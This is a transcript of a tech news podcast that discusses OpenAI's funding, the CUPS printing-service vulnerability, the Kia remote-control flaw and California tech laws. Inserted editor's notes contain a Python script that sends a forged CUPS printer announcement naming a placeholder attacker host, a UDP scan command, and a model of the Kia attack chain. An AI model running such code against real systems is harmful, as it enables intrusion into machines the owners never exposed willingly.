Now, since it's not open anymore, it's not a nonprofit and all these other things, investing in it is basically investing in another company that they don't own or reap the benefit of, really, at least in any really good ways, or the best ways that you could reap the benefits. Like, if they were an open source thing, then, yeah, you get all sorts of benefit by investing into it, because then everybody gets the same benefit. So. But now it's like, oh, I gotta pay, you know, and Microsoft, you know what I mean? Like, it just seems like it might be some business thing on the back end. [00:30:48] Speaker A: Yeah, it could be. Um, in fact, I would say that's likely. [00:30:51] Speaker B: Yeah. [00:30:52] Speaker A: Um, I, I did just. [00:30:54] Speaker B: Did they offer any. [00:30:55] Speaker A: Pull this up. So this article has more information on OpenAI being kind of in a weird spot right now. But looking at a different source here. It seemed a little sensationalist, so I didn't want to grab it at first, but it said, oh, bankruptcy. Bankruptcy flames linger as Apple wiggles out of its latest billion, you know, billion-dollar. [00:31:12] Speaker B: They're worried about losing their $6.5 billion. [00:31:15] Speaker A: Right. [00:31:16] Speaker B: Because OpenAI is going to go. [00:31:18] Speaker A: Supposedly they are on the brink of bankruptcy, with projections of $5 billion in losses within twelve months. And those are no small numbers. I'm sure OpenAI, probably, I mean, it's a company that works with big numbers. It's a very big company, and I think its products appear to be pretty popular, but they are apparently facing a lot of losses. Reportedly on the brink of bankruptcy. Reportedly, reportedly. [00:31:37] Speaker B: Listen, you can have a great product, but if you are not running the company that delivers that product very well, guess what happens to the company.
[00:31:45] Speaker A: And maybe that's why they're switching to a for-profit. They're trying to salvage it. [00:31:48] Speaker B: Hey, maybe, maybe we should go for a cash grab. [00:31:50] Speaker A: So that's part of why they're doing this. They're trying to get funding to prevent them from falling into bankruptcy. [00:31:56] Speaker B: That seems reasonable. [00:31:57] Speaker A: And it was supposed to be Microsoft, Nvidia, and Apple. They were the big three that were going to invest in OpenAI, which makes sense. So now Nvidia's still looking at investing, and Microsoft is looking at backing them as well. But we'll see. I don't know, if OpenAI is changing their business structure and everything. [00:32:11] Speaker B: And if they go, if they go for-profit, does that put them on the table to be acquired? [00:32:17] Speaker A: Good question. [00:32:18] Speaker B: Right. [00:32:18] Speaker A: Oh, that would be interesting. [00:32:19] Speaker B: So then one of those companies acquires them. [00:32:21] Speaker A: Yeah. [00:32:22] Speaker B: Now that's ours. [00:32:24] Speaker A: Hmm. [00:32:25] Speaker B: Right. [00:32:26] Speaker A: Yeah, because then, well, the only good thing that could come out of that is, if Microsoft acquires them, they can get rid of that stupid Copilot and just replace it with ChatGPT. I'm sorry, that's. [00:32:34] Speaker B: They are, they are really committed to Copilot. [00:32:37] Speaker A: I'm still sick and tired of Copilot. I'm so sick of hearing about it. So yeah, allegedly OpenAI is running on fumes and Apple is not looking to save them, is how this is seeming to shape up. Again, I don't want to assume, but figured I'd throw that in there, because we did talk quite a bit about Apple Intelligence, and that was a big selling point for it. So that'll do it for that one. Let's see, we've got 1, 2, 3, 4, 5, 6. [00:32:58] Speaker B: We get another one. [00:32:59] Speaker A: You think we get another one?
All right, I'm going to have you take the lead on this one, because I didn't read this one. Attacking UNIX systems via CUPS, part one. I think this is a write-up by, like, a researcher, right? [00:33:09] Speaker B: It is. This is the person that discovered the vulnerability. Oh, so this is their, this is kind of like the narrative of what occurred. [00:33:15] Speaker A: Oh, okay. [00:33:16] Speaker B: So if you're looking to really get some meat and potatoes on this. Yeah. You can go to Hacker News or whatever, but the details are in this article that we have available, which I'm sure we'll make. [00:33:27] Speaker A: Yeah, we'll put them in the description. [00:33:28] Speaker B: Yeah. So CUPS has been around a hot minute. This is the printer service that you find in Unix systems. And it's been doing its job for quite some time. Ultimately, a researcher discovered that, through CUPS protocols, I can basically install a printer without authentication. And then I can tack on some code as part of that printer. And then when anybody tries to use the printer to print, it executes the code. FYI. Maybe you'll be interested in that. [00:34:05] Speaker A: Interesting. [00:34:06] Speaker B: So here's the thing. CUPS is bundled with almost every Linux system, Unix system available, known to man. That's a lot. [00:34:20] Speaker A: That is quite a lot. [00:34:21] Speaker B: That's a lot. To have this level of remote code execution. That's why the world caught fire about this. Now everybody's kind of calming down and cooler heads are prevailing. You know, it's not so bad. I highly recommend you read this article. I'll give you the Cliff's Notes version here. The researcher, what was his name? I forget his name here. [00:34:44] Speaker A: I'll see if I can find it. [00:34:45] Speaker B: Yeah, if you would. Thank you. It's not a name that's, like, American. [00:34:49] Speaker A: Okay.
[00:34:50] Speaker B: So it's a little, it's a little different from what I'm used to, so I'm not remembering it. [00:34:54] Speaker A: Sure. [00:34:54] Speaker B: What they were saying is, they discovered this and then they disclosed it. And apparently the kickback that he got from whatever organization creates CUPS and handles that was: you called my baby ugly. My baby ain't ugly. That's how it's supposed to work. Like, it's not a flaw, it's a feature. And it's like, eh. And he was very dis, what's the word I'm looking for here? Disenfranchised with this whole situation. The fact that he's like, no, I feel like I've really found a real flaw here and you're not doing anything about it. And he continued to try to reach out to them. He even has all the receipts. And he puts in a lot of their text back and forth, or email, or whatever it was, however they were messaging back and forth. And he was like, I'm just here to help. I think you guys do a great job. I'm not trying to call your baby ugly, basically, but I do feel like this is an actual flaw that you need to do something about. And apparently he was kind of ignored and even kind of lambasted for it. [00:36:02] Speaker A: Wow. [00:36:03] Speaker B: Yeah. And he was like, well, cool, I'm gonna put this on Twitter then. Or whatever he did. [00:36:07] Speaker A: Yeah. That's a good way to get researchers to not help you. [00:36:10] Speaker B: Like, and this has happened in the past. It's not the first time I've heard of this happening, where a researcher has discovered something that they feel like is fairly important, and the organization that it's affecting just ignores them or tells them it's not a problem. Don't worry about it. [00:36:26] Speaker A: Does the name Simone Margaritelli sound right? Sounds maybe Italian. [00:36:30] Speaker B: That's it. [00:36:31] Speaker A: Margaritelli. Anyway, I found it on, it was a.
Because the write-up here that he, that this he or she did doesn't, I don't think, have a name attached to it, but The Hacker News referenced it and gave them, gave them credit. So. Simone Margaritelli. Applaud. Applaud that person. [00:36:48] Speaker B: Good for you. And so the reason, I think you did mention this was part one. Says part one. [00:36:53] Speaker A: Yes. [00:36:54] Speaker B: At the end of the article, it says, I have more. I'm waiting to release it based on how well this goes. Yes. [00:37:03] Speaker A: Interesting. Yeah, he said the first of two, possibly three write-ups. Wow, so this might be a trilogy. [00:37:09] Speaker B: Yeah. What was interesting to me is Simone kind of pointed out that there's a lot of legacy stuff that's still in production that has been around since, like, the seventies and eighties. And they're probably rife with a lot of problems that we just have not discovered yet. And we just gotta kind of point, point our microscopes toward these systems and go, hmm, let's see what you're doing here. And maybe we can pick up on some more vulnerabilities that are maybe even already being exploited that we just don't know about. I mean, CUPS. Who would think CUPS, right? CUPS is on by default on most. Like, you fire up Linux, do a UDP scan, 631 is probably showing up, because that's how you print, that's how you get printers to print. It's like, hey, are we printing things? I know Wes likes to print stuff, but. [00:38:02] Speaker A: Well, like you said, if it's rolled into a lot of these, like, it's not like you can avoid it, really. [00:38:07] Speaker B: You can. You just don't turn that service on by default. But if you want to print. Heck. So here's the thing. Let's say I spin up a web server. Guess what most web servers run? Linux, Linux and Apache. [00:38:21] Speaker A: Okay, right. [00:38:21] Speaker B: They're running Apache on Linux. [00:38:23] Speaker A: Okay, right. [00:38:24] Speaker B: That faces the Internet.
I got a Linux system facing the Internet. Guess what is now exposed to the Internet? CUPS. Yeah, right. And UDP kind of gets forgotten about a lot, because, big deal, right? We don't run services on UDP. Well, yeah, we kind of do. [00:38:47] Speaker A: Huh, interesting. [00:38:49] Speaker B: Yeah. [00:38:49] Speaker A: I will be curious to see if, when, I guess, he comes out with the next part of this, and then if there is a part three to this. So maybe this will be a deja news in the future. It's quite the write-up. There's a lot. [00:39:02] Speaker B: Yeah, no, it's very detailed. I read the whole thing. It was very interesting. You know, there's a lot of code snippets in here and everything. Him showing you how he. It was, like I said, basically a narrative of the impetus for starting to do the research, and then where the research led to. Interesting thought paths. [00:39:21] Speaker A: Yeah. [00:39:22] Speaker B: And that led him to, oh, this is an issue, I bet I can. Oh, yep, yep, there it goes. And putting two and two together and realizing, oh, how about that? [00:39:33] Speaker A: Yeah. [00:39:34] Speaker B: So like I said, I highly recommend this as a read. If you're not into cybersecurity, then don't read it. But if you are, this is a great way for you to go, oh, this is how bugs are found. This is how you find really big critical flaws: you let that curiosity kind of take you down the path, and don't assume that what you think is true is true. You verify it. You go, how about that? I never would have thought that these two things were doing this. Why would you? Like, that's dumb, right? You're going to be saying, why would you do that? Because that's dumb. But, oh, you just didn't think about it, right? At the time, when someone was writing the code, it was like, I just gotta get this thing to work, and, okay, yeah, that's kind of dumb, but I'll fix it later. [00:40:21] Speaker A: Yeah.
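[Editor's note: the cups-browsed exploitation path Daniel describes above — an unauthenticated UDP datagram to port 631 that advertises a rogue printer, with code execution later triggered when someone prints — can be sketched in Python. The announcement format below follows the shape of a legacy CUPS browse packet as reported in the public write-up; treat the exact fields as an approximation, and note that the attacker address is a placeholder. This sketch only builds and sends the announcement; the real chain also requires the attacker to serve malicious IPP attributes, which is not implemented here.]

```python
import socket

CUPS_BROWSED_PORT = 631  # cups-browsed listens here for legacy CUPS browse packets (UDP)

def build_browse_packet(printer_uri: str, location: str = "Office", info: str = "Printer") -> bytes:
    """Build a legacy CUPS browsing announcement (approximate format).

    Per the reported packet shape: '<type> <state> <uri> "<location>" "<info>"'.
    type=0 and state=3 advertise an available remote printer; a vulnerable
    cups-browsed would then connect back to <uri> to fetch printer attributes.
    """
    return f'0 3 {printer_uri} "{location}" "{info}"'.encode()

def announce_rogue_printer(target_host: str, attacker_uri: str) -> bytes:
    """Send the forged announcement to a cups-browsed instance (lab use only)."""
    packet = build_browse_packet(attacker_uri)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.sendto(packet, (target_host, CUPS_BROWSED_PORT))
    return packet

# Placeholder addresses -- do not run outside an isolated lab:
# announce_rogue_printer("192.0.2.10", "http://192.0.2.99:8631/printers/evil")
```

As Daniel notes, a UDP scan of port 631 (for example, `nmap -sU -p 631 <host>`) is a quick way to check whether a box is exposing this service in the first place.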
[00:40:22] Speaker B: And then it just becomes a part of the thing, and it gets lost, because there's thousands of lines of code, if not millions of lines of code in some instances. So it's just really interesting to see how they were able to discover this. [00:40:32] Speaker A: Maybe this will pop up again if he does another write-up. Who knows? [00:40:34] Speaker B: I would assume that, yes, this is not the last we've heard of this. [00:40:37] Speaker A: Okay. Maybe we'll talk about it in a future episode. We'll definitely link that too in our articles, in our description, so that you can read more on that write-up, if you want some more detail on how this person did this. We're going to go ahead and take a quick break so that we can chug our energy drinks. And I'm probably going to go get a snack. But we will be back with more tech news right after this. [00:40:56] Speaker B: There's a new CCNA in town, and. [00:40:58] Speaker A: Here at ACI Learning, we've got you. [00:41:00] Speaker B: Covered, with a brand new CCNA version. [00:41:05] Speaker A: This course covers the theory that you need to succeed, as well as the practical, hands-on application of technologies. [00:41:16] Speaker B: You're going to learn network fundamentals, network. [00:41:20] Speaker A: Access techniques, technologies, IP connectivity, IP services. Don't waste any more time. Get signed up for the new CCNA here at ACI Learning. Welcome back. Thanks so much for sticking with us through that break. We have got. That was rough. It was rough. It was really rough. [00:41:44] Speaker B: It was a good, what, 27 seconds or an hour-long ad roll? [00:41:47] Speaker A: And I lied. I didn't get a snack, so I lied to you. [00:41:50] Speaker B: She's a liar. [00:41:50] Speaker A: But I promise I won't lie to you in the next half of this show. [00:41:53] Speaker B: How are we supposed to believe you now? [00:41:56] Speaker A: Well, I guess you just have to make that choice for yourself.
[00:41:58] Speaker B: The trust has been broken. [00:41:59] Speaker A: Weigh the risk versus the rewards, and you can decide. And I would love to hear what you think of what you decide. [00:42:04] Speaker B: I gotta deal with people. [00:42:05] Speaker A: Leave a comment. And if you're enjoying this episode so far, leave a like, subscribe, so you never miss an episode in the future. We are going to be in Deadwood next week for our episode, so that's gonna be a fun one. This is the last time we'll be in this studio for a couple of weeks. So looking forward to that. But getting into the rest of these articles, this is a favorite. A favorite segment of ours. Pork chop sandwiches. Pork chop sandwiches. Oh. [00:42:28] Speaker B: Pork chop sandwiches. [00:42:29] Speaker A: Oh. So if you don't know the purpose. [00:42:35] Speaker B: Yeah, you can now, right? Because he puts it in post, right? [00:42:38] Speaker A: Yeah. Yeah, I think so. Yeah. [00:42:39] Speaker B: That's so funny. [00:42:40] Speaker A: So if you don't know the purpose for this segment, it's basically just, like, what the hell is going on? [00:42:45] Speaker B: Yeah. [00:42:45] Speaker A: What? So this article, I think, fits quite nicely into that category. [00:42:49] Speaker B: I'm gonna go with. Yes. [00:42:50] Speaker A: Hacking Kia: remotely controlling cars with just a license plate. And, I mean, if you've got a car, it has a license plate, right? So we'll take a look at this here. [00:43:00] Speaker B: Daniel pulled this. Like my cousin's car, sitting on blocks. [00:43:04] Speaker A: Yeah, you should have a license plate. If you don't. [00:43:06] Speaker B: A big oil stain underneath it on the. [00:43:08] Speaker A: Yeah, you should probably. It's like Christine is just sitting up there deteriorating until somebody gets a hold of this flaw, or of this vulnerability, and brings it back to life. So this is something that they demonstrated. This. And, Daniel, you probably read through this in more detail.
[00:43:22] Speaker B: Yes, I did. I read this entire article, and I watched all the videos. And then I was like, wow, what the. Huh? Why? And then, oh, man. And that's kind of the gamut of emotions that I went through in a two-second sound bite. And so here's what's up. Security researchers doing what security researchers do. This organization, or this person, Sam Curry, right. This is their, their blog. Anyway, it says, on June 11, 2024, we discovered a set of vulnerabilities in Kia vehicles that allowed remote control over key functions using only a license plate. These attacks could be executed remotely on any hardware-equipped vehicle in about 30 seconds. [00:44:08] Speaker A: Wow. [00:44:09] Speaker B: And here was the fun part. You ready? Regardless of whether it had an active Kia Connect subscription or not. [00:44:18] Speaker A: So if you're a Kia owner, you. [00:44:19] Speaker B: Just had to have a Kia with a license plate. [00:44:22] Speaker A: That's crazy. [00:44:23] Speaker B: For this to work, obviously, it had to, you know, have some built-in electronical features as well. It's not like I went and grabbed a 2003 Kia and I'm able to pull this off. It has to be a modern Kia. [00:44:36] Speaker A: But most cars produced in, like, the last ten years have electronic components to some degree. [00:44:39] Speaker B: Yes. And that's what really made me kind of, like, piss down my leg when I saw this. I was like, that is so. I'm buying a 1988 Ford Mustang with no electronics. This is the devil, right? This is the devil. They put the devil in your car. The devil is now running your car. How do you feel about Satan behind the wheel, right? The big red scaly one himself in control of your vehicle. I don't feel good about it. I do not feel good about it at all. I'm putting my tinfoil hat on. I can see governments misusing this. It's going crazy. It's going crazy. Yeah. Thank you. Thank you, Christian. Just let it seep in, down inside your inside body.
[00:45:26] Speaker A: You're going Church Lady direction for a second. Really, Satan behind the wheel. But you're right. That was pretty good. But I can see what you mean, because it doesn't really, you know. Usually it's like, well, if you don't like it, then just don't use this service. Or don't. But if you've bought a Kia, even if you don't use this Kia Connect, whatever, you're kind of screwed. Like, I mean, this has been patched. But in the event that things like this happen, this could happen in theory to any car manufacturer, right? If you have a Kia, it's not even an issue of, like, well, then just don't use that service. What are you supposed to do? Go sell your car, I guess. [00:45:58] Speaker B: Yes. You don't buy a Kia. [00:45:59] Speaker A: Yeah. [00:46:00] Speaker B: And of course, this is just because they are, for whatever reason, focused on Kia. Maybe one of them had a Kia. Like, let's hack my Kia. [00:46:06] Speaker A: Yeah. [00:46:07] Speaker B: It was a group of researchers that kind of got together and did all this stuff. It goes to the fact, and here was the other fun fact. Here's what they could do. They built a custom tool, which they did not make available to the general public. They did the proper thing, responsibly disclosed this to Kia. Kia patched the issue. But what's the next one, right? Why does my car need the ability to have control over. Am I that lazy? I'm sorry, gotta call a spade a spade here. Am I that lazy that I need remote start? That I need to be able to contact Kia? Is it nice? Yes. Yes, it is. But I feel like we've comforted ourselves into a corner that, if we keep going, we won't be able to get out of. Because not only were they able to unlock the car and start the car, they could get the GPS location of where the car is. They get who owns the car, information about the owner that owns the car. Like, there was tons of information that was disclosed through this. And that makes me, like, terrified.
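[Editor's note: the chain the researchers described — license plate resolved to a VIN, then an improperly scoped dealer-side token used against owner-facing endpoints — can be modeled as a sequence of logical steps. Every URL, field name, and token below is a hypothetical placeholder, not a real Kia endpoint; the sketch only plans the reported flow and sends nothing.]

```python
from dataclasses import dataclass

@dataclass
class ApiStep:
    """One logical step in the reported attack chain (illustrative only)."""
    name: str
    request: dict

def plan_attack_chain(license_plate: str) -> list:
    # All URLs and fields below are hypothetical placeholders, not real Kia APIs.
    vin = f"<VIN-resolved-from-{license_plate}>"   # step 1: plate -> VIN via a lookup service
    dealer_token = "<token-from-dealer-signup>"    # step 2: self-registered "dealer" credentials
    return [
        ApiStep("resolve_vin", {"url": "https://plate-lookup.example/query",
                                "plate": license_plate}),
        ApiStep("dealer_login", {"url": "https://dealer.example/register",
                                 "yields": dealer_token}),
        ApiStep("owner_lookup", {"url": "https://owners.example/vehicle",
                                 "vin": vin, "auth": dealer_token}),
        ApiStep("send_command", {"url": "https://owners.example/command",
                                 "vin": vin, "action": "unlock", "auth": dealer_token}),
    ]
```

The point the hosts are making falls out of the model: once the dealer token is accepted by owner endpoints, every later step (owner info, geolocation, unlock, start) rides on one server-side authorization mistake, which is why the fix was entirely on Kia's backend rather than in any car.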
[00:47:28] Speaker A: Oh, yeah. [00:47:28] Speaker B: I don't need people knowing where my car is. What. What do you need to know that for? [00:47:33] Speaker A: Yeah. [00:47:34] Speaker B: If someone steals my car, so what? It's stolen. Oh, well, right. It's just a thing. That's why I pay insurance, right? And the insurance comes along, gives me a big, fat check, and I go get another car. [00:47:47] Speaker A: The thing that came to my mind, especially with that geolocation stuff, is I'd be scared for myself for, like, trafficking concerns. That would be what would freak me out, because I was looking at it. It is quite the list of vehicles that are affected. [00:47:58] Speaker B: Oh, yeah. [00:47:58] Speaker A: It's with all these, the new 2025 models. But, like, Christian, if you show the graphic, it's like, you know, you keep scrolling. You keep scrolling. It's 2025, 2025. But all the way down. I mean, it keeps. And this is read-only, but it just keeps going and going and going. [00:48:13] Speaker B: Maybe it goes all the way. [00:48:15] Speaker A: All the way to 2014. [00:48:17] Speaker B: Years ago. [00:48:17] Speaker A: Ten years. And when you go further back, it's like, okay, well, no, it can't remote unlock. No, it can't. But geolocation is one of the things that you could do in all these vehicles. So for me, I'm scared to, like. I go to Target and come back out to my car, and I'm, like, checking under the car, and maybe I'm a little paranoid, but this is kind. [00:48:32] Speaker B: Of how you have to be. Somebody slips an AirTag in. [00:48:34] Speaker A: Right. This is the kind of thing where, even if I fully. All you would have to do is look at my license plate, if I drove a Kia. Right. [00:48:39] Speaker B: Yeah. [00:48:39] Speaker A: And if there was a vulnerability like this that was active, then, okay, yeah, we can geolocate her vehicle now. That kind of thing would terrify me. So I guess I'm glad I don't drive a Kia.
[00:48:47] Speaker B: Yeah. [00:48:48] Speaker A: And this has been patched. But it just. The possibility now is in our minds. [00:48:51] Speaker B: I'm gonna get. I'm gonna get, like, a 1984 BMW. No, Mercedes diesel. Right. Then I'm gonna put veg oil in it and do biodiesel. And no tracking. I don't, hey, I do not like being tracked. I don't know. Yes, I have a phone. I get it. And I'm currently in the market for one that does not track. [00:49:10] Speaker A: What are the, like, no phones, or whatever it's called? [00:49:12] Speaker B: So there's one called the UP Phone. And then you can go, like, the Linux route, like PinePhone. And then there's GrapheneOS, if you can install GrapheneOS. But I'm really starting to get on the bandwagon here of, what do you need that for? What do you need the ability to hear and watch and do everything? It's because they want that information so they can target advertisements to you. I don't need to be advertised to. Right. This is. I don't care. If I need a product, I'll go to the store and I'll look and go, cool, cleans grimy mildew better than the competitor next to it. Try that. I don't need to have, like, these ultimately crazy targeted ads. And then, of course, the abuse that could come from those systems. Is there a convenience to it? Absolutely. Are there good uses for it? Absolutely. I'm not saying that there's not. I just don't think that, for me, it's worth it. [00:50:09] Speaker A: Yeah. The risks that come with it do not outweigh whatever convenience you get from it. I think as far as, like, ads, like targeted ads and stuff go, for me, it almost has the opposite intended effect. If I get a targeted ad, like you were talking about, like, cleaning products, if I get a targeted ad for, like, Ajax or whatever, the cleaner, I am going to be so irritated, especially if that keeps showing up, that I'm less likely to buy it. Or if I get, like, a YouTube ad and it's constantly, like, Grubhub, Grubhub, Grubhub.
I'm not using Grubhub ever again, because I'm so sick of it everywhere. Whereas the purpose is, they think I'd be interested in Grubhub, so I'm gonna keep getting that targeted ad. Now I hate you. I hope you go out of business. [00:50:42] Speaker B: That's exactly it. [00:50:43] Speaker A: You won't leave me alone. So it's like, the purpose of these targeted ads is to get us to buy your stuff. Maybe I'm alone in this, but for me, you are ensuring that I never buy from you again. [00:50:51] Speaker B: And I'm one consumer. Proud parenting moment. Kids were watching TV the other day, right? And I was in the kitchen, and, obviously, the kitchen and the living room are very closely connected, and the kids are watching. And one of my girls had the remote, and the other one was kind of paying attention while the one with the remote was not. And commercials came on, and all I hear is, mute. Because I've taught them so well to not pay attention to ads. [00:51:23] Speaker A: I will not be advertised to. [00:51:24] Speaker B: It was just, like, their default of just, like, oh, ads on, mute. I mute the ad, don't pay attention to it. [00:51:31] Speaker A: Smart. Smart. [00:51:32] Speaker B: Right. We teach them when they're young, and when they're old, they won't depart from it. [00:51:36] Speaker A: Either mute, or I just get up and leave and go to the bathroom. [00:51:38] Speaker B: Yeah. [00:51:38] Speaker A: Like, I will come back when you put my show back on. This makes me sound like one of the, like, the people from WALL-E that, like, they just have the screen in front of their face all the time. That's what I sound like. But you're right. Like, I don't want to be advertised to, out of spite. Even if this is a product I would enjoy. [00:51:50] Speaker B: Mute, skip, cancel. I don't like advertisements. I don't like targeted advertisements. Right. And for the love of God and all that is holy, get rid of pharmaceutical ads.
If there's a Change.org petition or something I can sign. I would highly consider removing a pinky finger if it meant that there would be no more drug advertisements on TV. I'd be like, you know what? I might be willing to take that hit. Yeah, I might. I might be willing. [00:52:21] Speaker A: I would have to agree with you on that. Yeah, yeah, absolutely. [00:52:24] Speaker B: Because the fact that I know the Jardiance jingle. [00:52:30] Speaker A: Or o-o-o-Ozempic. [00:52:32] Speaker B: Yeah, listen, I don't need to know about my A1Cs. I get it, for the people that do. But here's the thing. If I've got diabetes or whatever, like, my doctor is going to be the one to tell me, hey, what you need is Jardiance. [00:52:48] Speaker A: Yeah, exactly. [00:52:49] Speaker B: Or whatever variant there is. I don't make that decision. The doctor makes that decision. Because they're a doctor. I am not a doctor. [00:52:57] Speaker A: Well, then you get into territory of, like, if there's kickbacks from certain products. So it's like, I think, I think removing advertising for pharmaceutical products is a good place to start. [00:53:05] Speaker B: I bet there's some weird thing that we don't know about, that if I say to my doctor, Jardiance, he by law has to go, well, they requested Jardiance. [00:53:15] Speaker A: Yeah. [00:53:15] Speaker B: And it's in this space, so therefore, I must give them Jardiance. Even if they didn't necessarily ask for it. They mentioned it, and therefore it could be construed. Right. I don't know that that's totally. You know, off the dome. [00:53:28] Speaker A: We truly do live in a society. Speculating. We live in a society. Flippin'. Anyway. [00:53:33] Speaker B: Pork chop sandwiches, everyone. [00:53:34] Speaker A: Pork chop sandwiches. Tinfoil hat. [00:53:36] Speaker B: Yeah. I made two out of one. [00:53:37] Speaker A: It's just. It's a great way. Well, and, I mean, we're not done. We're not even done. I mean, this is.
I mentioned earlier, we got news all around the world. So jumping over to the West Coast, in California. We talked a little bit in recent weeks about some AI laws that might be coming into being. Turns out, not yet. The California governor vetoed an AI safety law that was apparently controversial. Basically said, hey, start over. So, lots of strong opinions on this. And initially, my thought was, because the reasoning that this guy gave was, hey, look, I totally want regulation in place, da da da da, but I think the way that we went about this, it was written too hastily. We gotta make sure we reconsider and consider every possible thing. Go back to the drawing board, rewrite this, da da da. But then again, I thought about it, and I'm like, this guy has claimed in the past. Gavin Newsom is the governor, right? I don't really have any opinions on politics in California, to be honest with you. I don't live there. He's previously claimed 32 of the world's 50 leading AI companies are said to be located in California. So I have to wonder if there is a little bit of, I don't want to over-regulate, because what if these companies start to leave because they don't like all these regulations in California? Maybe this is a tinfoil hat thing. I don't know. But I have to wonder if there is a financial motivation for the state of California to go, well, hang on. Let's just wait and be careful. And it's not so much, we need to rewrite this law to make sure that we are protecting consumers. It's more, well, we're over-regulating. We gotta make sure that these AI companies can still do what they need to do. [00:55:04] Speaker B: So, if I'm not mistaken, the reason that this came about, why Gavin Newsom has proposed these regulations, was due to the fact that Elon Musk put out a video, an AI video of Kamala Harris. Kind of like, I know we're kind of dipping into politics here.
And that's not what we mean to do, but just objectively saying, from what I understand, this is the timeline of events that occurred. Elon had put out this video. I think he used his Grok AI to create this video of her saying all the, you know, negative things about herself or whatever, like she was agreeing with negative things about her, right? And he said, this is. And he being Gavin Newsom said, well, this is. This is dangerous. This is misinformation. This is disinformation. [00:55:50] Speaker A: We gotta regulate. [00:55:51] Speaker B: And then Elon hit back with, it's called satire. It's called parody. That's. That's what goes on here. And then he was like, well, I'm gonna make it against the law. And now he's trying to make it against the law. [00:56:04] Speaker A: And that's interesting, because his. His criticism supposedly centered around the fact that he's saying this bill only regulates the largest AI models out there, and smaller AI models are exempt from enforcement. And that's a policy gap. But I would think a video like that is more likely to come from some dude just producing it and putting it out, hey, this is funny, you know? So I would think this law wouldn't have even taken care of that. So what's the point? [00:56:24] Speaker B: I don't know. I didn't look at the law, so. [00:56:26] Speaker A: And I'm. I'm never one to push for, like. [00:56:28] Speaker B: More regulation, much like the senators and congresspeople that we have. I didn't look at it. [00:56:33] Speaker A: You should run for office. [00:56:35] Speaker B: I'm sure as hell going to vote on it, though. [00:56:37] Speaker A: When it went through the legislature, it was approved prior to ending up on Gavin Newsom's desk, and he just said, no, we got to start from scratch. So I would be curious again. I know we're edging into dangerous territory here.
So without getting too political with it, I'd be curious to know, strictly from an AI regulation standpoint, what y'all's opinions are on that. Because, just like with regulating giant corporations to ensure that smaller businesses don't get, like, swallowed. Yeah, I can see the benefit to regulating certain things, but at the same time, I would never want to push for over-regulation. [00:57:12] Speaker B: It's always. It's always like a balancing act. [00:57:13] Speaker A: It is such a delicate thing. [00:57:14] Speaker B: Regulation and freedom of, like, what a company can and cannot do. [00:57:18] Speaker A: Right, because it's innovation. Right. But at the same time, you. [00:57:22] Speaker B: Can see, well, because you got both of the extremes, where if corporations have total freedom, they have no oversight. [00:57:31] Speaker A: Yeah. [00:57:32] Speaker B: You know, they kind of go into this whole corporatization and, like, the worst parts of capitalism. [00:57:38] Speaker A: Right, right. Absolutely. [00:57:40] Speaker B: You know, that extreme, the extreme part of that. And then the government, they also have their problems with going to extremes as well, where it's like, well, we're totally going to lock you down and you can't do anything without our say. And we're a giant behemoth of red tape and bureaucracy, therefore nothing ever gets done or can be gotten done. And, you know, so we're always, hopefully, trying to find that middle ground, that sweet spot, where companies have the freedom to innovate and do the things that they could, with guardrails in place enough to keep them out of the weeds of extremes. And the government doesn't get to overreach and kind of lock you down and control your life, but has some say-so. Again, it's a difficult thing to find that sweet spot. And here we are really dancing around political things, which we don't want to do.
But when it comes to AI, AI is growing rapidly, and if it continues on its pace, we don't know where it's going. It's growing so fast, we can't predict how it's gonna be used. [00:58:44] Speaker A: It's so unprecedented. Like, we've not seen anything like this before. It's hard to know. [00:58:47] Speaker B: It's like a Cambrian explosion. [00:58:49] Speaker A: It's hard to know what the right way to handle it is and how to go about it. So I can see there being a lot of stuff like this: bills or laws being introduced and then vetoed, or, hey, we gotta go back to the drawing board. So who knows about the stated reasons versus real reasons and things like that. But for better or for worse, this law has been vetoed, and there may be more coming up in the future. [00:59:07] Speaker B: My personal position is, let's just slow down. Like, let's, let's just slow down. [00:59:11] Speaker A: Yeah. [00:59:12] Speaker B: Right. [00:59:12] Speaker A: I would agree. [00:59:13] Speaker B: I'm not saying don't continue to invest and innovate with AI, but let's slow. Let's pump the brakes a bit. [00:59:19] Speaker A: Yeah. [00:59:19] Speaker B: Like, let's get used to what we do know about it before we start letting it continue to grow. Just, just take our time. But we're such a society now of instant gratification that I feel like Dr. Ian Malcolm in Jurassic Park: we were so, you know, concerned with whether or not we could, we forgot about whether or not we should. [00:59:42] Speaker A: Yeah. [00:59:43] Speaker B: And it's so true. That seems to be a problem. [00:59:45] Speaker A: I would agree. I would agree. [00:59:46] Speaker B: Dinosaurs are killing everybody. The AI dinosaurs are out there chewing up lawyers and chasing kids across a park. [00:59:54] Speaker A: I know. I saw it. [00:59:55] Speaker B: I did. [00:59:56] Speaker A: Crazy misinformation right here.
So on the other side, though, of California legislation, going into a little bit of, I guess, less political territory, there is a new law that will force storefronts to disclose that buyers don't actually own their digitally purchased media. So this is a bill that Gavin Newsom did sign into law over in California. And a lot of this is California. We don't live in California, but a lot of this tech stuff seems to get its start over there. So, you know, this may make its way over in our direction eventually. So basically, you know, if you don't know, I didn't know this until the past year or so. I didn't really think about it. But digital media, like video games and movies and tv shows, when you buy them through like Amazon Prime or whatever, you don't actually own them. So it can be. FYI. Yeah, FYI, if you didn't know, if. [01:00:39] Speaker B: You were under the impression that you owned that stuff. Yeah, we'll go ahead and fix you up here. [01:00:44] Speaker A: So this bill isn't going to necessarily, or it's not going to change that. It's not going to say, yes, you do own that media. You don't. But it is at least going to, in theory, force storefronts and things to be more obvious about the fact that you don't own these. And the way that it's going to do that is by prohibiting storefronts from using words like 'buy' or 'purchase,' any word that a reasonable person, or people such as ourselves, would understand to mean I own this. If they say, hey, buy this product, I would assume that I own that product because I paid for it and I purchased it. So they are going to have to use words that have to do with licensing. You are licensing this, and it's made very obvious that this license could expire at any time. So it's at least, I think, a step in the right direction for transparency, because if you don't already know that that's the case and that you don't own this digital media.
